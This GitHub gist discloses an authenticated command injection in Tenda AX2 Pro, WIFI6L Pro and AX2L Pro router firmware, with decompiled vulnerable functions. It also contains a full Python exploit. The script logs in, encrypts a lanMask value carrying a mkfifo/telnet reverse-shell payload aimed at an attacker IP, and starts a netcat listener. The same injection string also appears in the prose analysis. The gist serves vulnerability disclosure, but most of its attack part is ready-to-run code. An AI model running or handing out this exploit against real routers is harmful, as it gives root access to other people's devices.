Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Save Swind1er/da24125da98f6616a50a35a3e60141f4 to your computer and use it in GitHub Desktop.
Save Swind1er/da24125da98f6616a50a35a3e60141f4 to your computer and use it in GitHub Desktop.

[toc]

Tenda Home Router Command Injection Vulnerability PoC

Official Website

https://www.tenda.com.cn/default.html

Affected Device Models

  1. AX2 Pro
  2. WIFI6L Pro
  3. AX2L Pro

Affected Firmware Versions

V16.03.29.50

V16.03.29.48

V16.03.29.45

V16.03.29.36

V16.03.29.33

V16.03.29.30

Vulnerability Type

[RCE] Remote Command Execution (Authorized)

Vulnerability Description

A command execution vulnerability exists in the AX2 Pro home router produced by Shenzhen Tenda Technology Co., Ltd. (Jixiang Tenda). An attacker can exploit this vulnerability by constructing a malicious payload to execute commands and further obtain shell access to the router's file system with the highest privileges.

Make Your Life Simpler:

https://github.com/Swind1er/Video/raw/refs/heads/main/Tenda%E8%B7%AF%E7%94%B1%E5%99%A8%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E6%BC%94%E7%A4%BA%E8%A7%86%E9%A2%91_compressed.mp4

Vulnerability Analysis

image-20240921154831429

The vulnerability exists within the device's file system, specifically in the libgo.so shared library. More precisely, it is located in the formLanCfgSet function of this dynamic library. The key vulnerability location, after omitting some details, is as follows:

int __fastcall formLanCfgSet(int a1, int a2, int a3)
{

  puts("formLanCfgSet");
  v7 = 0;
  memset(v20, 0, sizeof(v20));
  memset(orig_lanip, 0, sizeof(orig_lanip));
  memset(orig_lan_mask, 0, sizeof(orig_lan_mask));
  v17[0] = 0;
  v17[1] = 0;
  memset(&lanIP, 0, 0x28u);
  lanIP = (char *)websGetJsonVar(a2, "lanIP", (int)"192.168.0.1");
  lanMask = websGetJsonVar(a2, "lanMask", (int)"255.255.255.0");
  dhcpLeaseTime = websGetJsonVar(a2, "dhcpLeaseTime", (int)&unk_B1EE4);
  startIP = websGetJsonVar(a2, "startIP", (int)"192.168.0.100");
  endIP = websGetJsonVar(a2, "endIP", (int)"192.168.0.200");
  lanDns1 = websGetJsonVar(a2, "lanDns1", (int)&unk_B1EE4);
  lanDns2 = websGetJsonVar(a2, "lanDns2", (int)&unk_B1EE4);
  dhcpEn = websGetJsonVar(a2, "dhcpEn", (int)"0");
  lanDnsEn = websGetJsonVar(a2, "lanDnsEn", (int)"1");
  GetValue("lan.ip", orig_lanip);
  GetValue("lan.mask", orig_lan_mask);
  GetValue("dhcps.en", v17);
//****//
    SetValue("lan.ip", lanIP);
    SetValue("lan.mask", lanMask);
//****//
}

It is evident that for the lan.ip and lan.mask fields passed in by the Client, the corresponding CGI function does not verify the reliability of the parameters and directly calls SetValue to set these fields. Correspondingly, upon rebooting the device, the netctrl binary program in the file system will invoke the following function (with unrelated code omitted). In firmware version V16.03.29.50, the call chain is main--->sub_40E710--->sub_40ABD0--->doSystemCmd--->system:

int sub_40ABD0()
{
  GetValue("lan.mask", v14);
  if ( !v14[0] )
    strcpy(v14, "255.255.255.0");
  GetValue("lan.ip", v13);
  v4 = get_eth_name(0);
  doSystemCmd("ifconfig %s down", v4);
  v5 = get_eth_name(0);
  doSystemCmd("ifconfig %s up", v5);
  if ( LOBYTE(v13[0]) )
  {
    v6 = get_eth_name(0);
    doSystemCmd("ifconfig %s %s netmask %s ", v6, v13, v14);
  }
}

As shown above, for the lan.ip and lan.mask fields, when they are called through doSystemCmd, no command injection check is performed on their values. The implementation of doSystemCmd is as follows:

int doSystemCmd(char *a1, ...)
{
  int v2; // [sp+20h] [+20h]
  _DWORD v3[512]; // [sp+28h] [+28h] BYREF
  int vars0; // [sp+828h] [+828h]
  int vars4; // [sp+82Ch] [+82Ch]
  void *v7; // [sp+834h] [+834h] BYREF
  int v8; // [sp+838h] [+838h]
  int v9; // [sp+83Ch] [+83Ch]
  va_list va1; // [sp+840h] [+840h] BYREF
  va_list va; // [sp+834h] [+834h]

  va_start(va1, a1);
  va_start(va, a1);
  v3[0x1FF] = va_arg(va, _DWORD);
  vars0 = va_arg(va, _DWORD);
  vars4 = va_arg(va, _DWORD);
  va_arg(va, _DWORD);
  va_copy(va1, va);
  va_arg(va1, _DWORD);
  va_arg(va1, _DWORD);
  va_arg(va1, _DWORD);
  v7 = (void *)v3[0x1FF];
  v8 = vars0;
  v9 = vars4;
  memset(v3, 0, sizeof(v3));
  log_debug_print("doSystemCmd", 0x4B, 0, "common_so");
  vsnprintf(v3, 0x800, a1, va);
  v2 = system(v3);
  log_debug_print("doSystemCmd", 0x51, 0, "common_so");
  return v2;
}

For the parameters passed in, doSystemCmd also does not perform any validation; instead, it simply formats the string and passes it to system for command execution. Therefore, an attacker can manipulate the value of the lan.ip field passed by the client to something like: 255.255.255.0;mkfifo /var/a;sleep 7;telnet 192.168.0.38 4444 0</var/a | sh 1>/var/a. When the router reboots, it will execute the command and establish a reverse shell to a specified IP and port. For a detailed exploitation process, please refer to the demonstration video.

EXP

The HTTP requests in earlier firmware system versions may differ from those in firmware version V16.03.29.50. This script has been tested on the V16.03.29.50 firmware.

import requests
import logging
import argparse
import hashlib
import time
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
import base64
import json
import subprocess
import threading

# nc64.exe -lvnp 4444 -s 192.168.0.38
proxy = False
proxies = {
        'http': "127.0.0.1:8080",
        'https': "127.0.0.1:8080"
    } if proxy else None

__author__ = "Yaxuan Wang(Sw1ndl3r)"
__email__ = "2532775668@qq.com"

logging.basicConfig(level=logging.DEBUG)

global_stok = None
global_sign = None
global_iv = "EU5H62G9ICGRNI43"

def get_current_timestamp():
    return str(int(time.time()))

def aes_cbc_pkcs7_encrypt(data, key_utf8, iv_utf8):
    key = key_utf8.encode('utf-8')
    iv = iv_utf8.encode('utf-8')
    
    cipher = AES.new(key, AES.MODE_CBC, iv)
    padded_data = pad(data, AES.block_size)
    encrypted_data = base64.b64encode(cipher.encrypt(padded_data))
    
    return encrypted_data

def aes_cbc_pkcs7_decrypt(encrypted_data, key_utf8, iv_utf8):
    key = key_utf8.encode('utf-8')
    iv = iv_utf8.encode('utf-8')
    encrypted_data = base64.b64decode(encrypted_data)
    cipher = AES.new(key, AES.MODE_CBC, iv)
    decrypted_data = cipher.decrypt(encrypted_data)
    unpadded_data = unpad(decrypted_data, AES.block_size)
    
    return unpadded_data

def hash_password(password):
    hashed = hashlib.md5(password.encode()).hexdigest().upper()
    return hashed

def send_login_request(session, host_ip, username, password, proxies=None):
    url = f"http://{host_ip}/login/Auth"
    
    headers = {
        "Host": host_ip,
        "Content-Length": "66",
        "Accept": "application/json, text/plain, */*",
        "X-Requested-With": "XMLHttpRequest",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36",
        "Content-Type": "application/json; charset=UTF-8",
        "Origin": f"http://{host_ip}",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.9",
        "Connection": "close"
    }
    
    payload = {
        "userName": username,
        "password": password
    }
    
    response = session.post(url, headers=headers, data=json.dumps(payload), proxies=proxies)
    
    return response

def send_stokCfg_request(session, host_ip):
    url = f"http://{host_ip}/goform/stokCfg?0.481083665320881"
    
    headers = {
        "Host": host_ip,
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
        "Accept": "*/*",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate",
        "X-Requested-With": "XMLHttpRequest",
        "Connection": "close",
        "Referer": f"http://{host_ip}/main.html",
        "Pragma": "no-cache",
        "Cache-Control": "no-cache"
    }
    
    response = session.get(url, headers=headers)
    
    if response.status_code == 200:
        logging.debug(f"GET Request successful. Response: {response.text}")
        
        try:
            json_response = response.json()
            if 'stokCfg' in json_response:
                global global_stok, global_sign
                stok_cfg = json_response['stokCfg']
                global_stok = stok_cfg.get('stok')
                global_sign = stok_cfg.get('sign')
                logging.info(f"Extracted stok: {global_stok}, sign: {global_sign}")
            else:
                logging.error("Response format error: 'stokCfg' field not found.")
        except ValueError as ve:
            logging.error(f"Error decoding JSON response: {ve}")
    else:
        logging.error(f"GET Request failed with status code: {response.status_code}")
        logging.error(f"Response: {response.text}")

def send_system_reboot_request(session, host_ip, encrypted_data):
    url = f"http://{host_ip}/;stok={global_stok}/goform/setModules?modules=systemReboot"
    
    headers = {
        "Host": host_ip,
        "Content-Length": str(len(encrypted_data)),
        "Accept": "application/json, text/plain, */*",
        "X-Requested-With": "XMLHttpRequest",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36",
        "Content-Type": "application/json; charset=UTF-8",
        "Origin": f"http://{host_ip}",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.9",
        #"Cookie": "bLanguage=cn; _:USERNAME:_=0eac5589ffc2e90d0948bc881c5bafde",
        "Connection": "close"
    }

    payload = {
        "data": encrypted_data.decode('utf-8')
    }

    response = session.post(url, headers=headers, data=json.dumps(payload),proxies=proxies)
    
    if response.status_code == 200:
        logging.info("POST Request to system reboot sent successfully.")
        logging.debug(f"Response: {aes_cbc_pkcs7_decrypt(json.loads(response.text).get('data'), global_sign, global_iv).decode('utf-8')}")
        
    else:
        logging.error(f"POST Request failed with status code: {response.status_code}")
        logging.error(f"Response: {response.text}")

def send_set_device_info_request(session, host_ip, encrypted_data, global_stok):
    url = f"http://{host_ip}/;stok={global_stok}/goform/setModules?modules=setDeviceInfo"
    
    headers = {
        "Host": host_ip,
        "Content-Length": str(len(encrypted_data)),
        "Accept": "application/json, text/plain, */*",
        "X-Requested-With": "XMLHttpRequest",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36",
        "Content-Type": "application/json; charset=UTF-8",
        "Origin": f"http://{host_ip}",
        "Referer": f"http://{host_ip}/index.html",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.9",
        #"Cookie": "bLanguage=cn; _:USERNAME:_=5fd7c83d72a701c0efd1b5f8851a78d3",
        "Connection": "close"
    }

    payload = {
        "data": encrypted_data.decode('utf-8')
    }

    response = session.post(url, headers=headers, data=json.dumps(payload))
    
    if response.status_code == 200:
        logging.info("POST Request to set device info sent successfully.")
        logging.debug(f"Response: {aes_cbc_pkcs7_decrypt(json.loads(response.text).get('data'), global_sign, global_iv).decode('utf-8')}")

    else:
        logging.error(f"POST Request failed with status code: {response.status_code}")
        logging.error(f"Response: {response.text}")

def send_formLanCfgSet(session, host_ip, encrypted_data, global_stok):
    url = f"http://{host_ip}/;stok={global_stok}/goform/setModules?modules=lanCfg"
    
    headers = {
        "Host": host_ip,
        "Content-Length": str(len(encrypted_data)),
        "Accept": "application/json, text/plain, */*",
        "X-Requested-With": "XMLHttpRequest",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36",
        "Content-Type": "application/json; charset=UTF-8",
        "Origin": f"http://{host_ip}",
        "Referer": f"http://{host_ip}/index.html",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.9",
        #"Cookie": "bLanguage=cn; _:USERNAME:_=5fd7c83d72a701c0efd1b5f8851a78d3",
        "Connection": "close"
    }

    payload = {
        "data": encrypted_data.decode('utf-8')
    }

    response = session.post(url, headers=headers, data=json.dumps(payload))
    
    if response.status_code == 200:
        logging.info("POST Request to set device info sent successfully.")
        logging.debug(f"Response: {aes_cbc_pkcs7_decrypt(json.loads(response.text).get('data'), global_sign, global_iv).decode('utf-8')}")

    else:
        logging.error(f"POST Request failed with status code: {response.status_code}")
        logging.error(f"Response: {response.text}")

def attach(password,host,username,local_ip,port):
    session = requests.session()
    hashed_password = hash_password(password)
    logging.info(f"hased_password:{hashed_password}")

    response = send_login_request(session, host, username, hashed_password)
    if response.status_code == 200:
        logging.info("Login request sent successfully.")
        time.sleep(3)

        send_stokCfg_request(session, host)
 
        data ={
            "lanCfg":{
                "lanIP":"192.168.0.1",
                "lanMask":f"255.255.255.0;mkfifo /var/a;sleep 7;telnet {local_ip} {port} 0</var/a | sh 1>/var/a 2>&1;",
                "lanDnsEn":"1",
                "lanDns1":"8.8.8.8",
                "lanDns2":"114.114.114.114",
                "dhcpEn":"1"
            }
        }
        data = json.dumps(data).encode()
       
        encrypted_data_static = aes_cbc_pkcs7_encrypt(data, global_sign, global_iv)
        send_formLanCfgSet(session, host, encrypted_data_static,global_stok)
        
        logging.info("The command execution payload has been sent. For testing purposes, you need to manually restart the router.")
        logging.info("Router will be hijacked after reboot, waiting...")

    else:
        logging.error("Failed to send login request.")
        logging.error(f"Status code: {response.status_code}")
        logging.error(f"Response: {response.text}")

def main():

    parser = argparse.ArgumentParser(description='"Tenda router command execution vulnerability exploit"')
    parser.add_argument('-H', '--host', metavar='host', default='192.168.0.1', help='Router IP address.')
    parser.add_argument('-U', '--username', metavar='Username', required=True, help='Login username.')
    parser.add_argument('-P', '--password', metavar='Password', required=True, help='Login password.')
    parser.add_argument('-L', '--local-ip', metavar='Local IP', required=True, help='IP address assigned to the local machine by the router.')
    parser.add_argument('-p', '--port', metavar='Port', type=int, required=True, help='Port number that the local machine is listening on.')
    args = parser.parse_args()

    logging.info(f'Author: {__author__}, email: {__email__}')
    logging.info(f'Host IP: {args.host}')
   
    attack_thread = threading.Thread(target=attach, args=(args.password, args.host,args.username,args.local_ip,args.port))
    attack_thread.start()

    logging.info(f'Netcat start listening on port {args.port}.')
    result = subprocess.run(f'nc -lvnp {args.port} -s {args.local_ip}', shell=True)

    if result.returncode == 0:
        logging.info("Done")
    else:
        logging.error("Command execution failed.")

if __name__ == "__main__":
    main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment